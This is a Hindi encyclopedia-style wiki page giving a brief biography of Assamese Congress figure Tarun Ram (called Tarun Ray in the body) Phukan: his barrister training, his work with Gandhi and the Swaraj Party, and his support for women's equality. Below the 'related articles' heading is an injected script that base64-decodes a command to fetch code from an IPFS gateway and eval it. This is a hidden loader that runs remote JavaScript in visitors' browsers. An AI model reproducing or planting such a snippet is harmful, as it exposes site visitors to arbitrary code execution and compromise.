तरुण राम फुकन

भारत डिस्कवरी प्रस्तुति
Revision as of 13:04, 7 December 2011 by रविन्द्र प्रसाद (talk | contribs) (''''तरुण राय फुकन''' असम के प्रमुख कार्यकर्ताओं में से ...' के साथ नया पन्ना बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

तरुण राय फुकन असम के प्रमुख कार्यकर्ताओं में से एक थे। इनका जन्म 22 जनवरी, 1877 ई. को गुवाहाटी में हुआ था। इन्होंने अपना व्यावसायिक जीवन बैरिस्टरी से प्रारम्भ किया था। स्वराज्य पार्टी के प्रचार-प्रसार में इनका बहुत बड़ा हाथ था। भारत में महिलाओं की स्थिति में सुधार लाने के लिए तरुण राय ने अपना बहुमूल्य योगदान दिया। वे महिलाओं की समानता के सदा पक्षधर रहे थे। 24 जुलाई, 1939 ई. में इनका निधन हुआ था।

  • तरुण राय फुकन ने कोलकाता के 'प्रेसिडेंसी कॉलेज' से शिक्षा प्राप्त की थी।
  • यहाँ से शिक्षा प्राप्त करने के बाद वे 1901 ई. में इंग्लैंड चले गए।
  • वहाँ से बैरिस्टरी की शिक्षा लेकर ये कोलकाता (भूतपूर्व कलकत्ता) आये और 'कोलकाता हाईकोर्ट' में वकालत शुरू की।
  • उनकी वकालत का यह क्रम अधिक दिनों तक नहीं चल सका, और वे वकालत छोड़कर कांग्रेस में सम्मिलित हो गए।
  • गांधी जी का उनके जीवन पर पूरी तरह से गहरा प्रभाव पड़ा था।
  • 1921 में गांधी जी की असम प्रदेश यात्रा में वे पूरे समय उनके साथ रहे थे।
  • जब कांग्रेस ग़ैरक़ानूनी घोषित हो गई, तो तरुण राय फुकन को गिरफ़्तार कर लिया गया था।
  • 1926 की गुवाहाटी कांग्रेस के वे स्वागताध्यक्ष थे, और उसी वर्ष कांग्रेस कार्यसमिति के सदस्य भी चुने गए।
  • तरुण राय फुकन स्वराज्य पार्टी में थे, और इसके प्रचार में उनका अग्रणी हाथ था।
  • सामाजिक सौहार्द्र के समर्थक, अस्पृश्यता के विरोधी और महिलाओं की समानता के पक्षधर फुकन का 1939 ई. को निधन हुआ।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

भारतीय चरित कोश |लेखक: लीलाधर शर्मा 'पर्वतीय' |प्रकाशक: शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली |पृष्ठ संख्या: 352 |


संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः